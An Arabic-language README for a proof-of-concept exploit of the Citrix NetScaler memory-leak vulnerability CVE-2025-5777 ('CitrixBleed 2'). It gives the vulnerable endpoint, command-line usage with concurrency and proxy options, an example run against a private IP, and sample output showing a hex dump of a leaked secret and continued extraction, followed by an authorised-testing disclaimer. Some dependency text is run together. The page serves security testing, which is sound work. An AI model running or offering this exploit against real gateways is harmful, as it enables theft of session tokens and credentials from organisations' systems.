
إثبات المفهوم (PoC) لتسريب الذاكرة في Citrix NetScaler
يستغل هذا السكربت ثغرة خطيرة في كشف الذاكرة في أجهزة Citrix NetScaler ADC/Gateway، والمعروفة باسم CVE-2025-5777 (وتُلقب بـ CitrixBleed 2). يؤدي إلى تسرب ذاكرة عبر نقطة النهاية /p/u/doAuthentication.do، مما يكشف ذاكرة غير مهيأة تحتوي على بيانات حساسة مثل أجزاء XML، والرموز، وربما بيانات الاعتماد.
aiohttpaiohttp, coloramaasyncio + aiohttp<InitialValue>python3 CVE-2025-5777.py http://<target> [options]
| الخيار | الوصف |
|---|---|
-v, --verbose | تفعيل مخرجات التصحيح المفصلة |
-p <proxy> | استخدام وكيل HTTP (مثل http://127.0.0.1:8080) |
-t <threads> | عدد الطلبات المتزامنة (الافتراضي: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
Author: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] Leak confirmed. Continuing extraction...
هذا الدليل البرهاني مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط. الفحص أو الاستغلال غير المصرح به للأنظمة التي لا تملكها غير قانوني.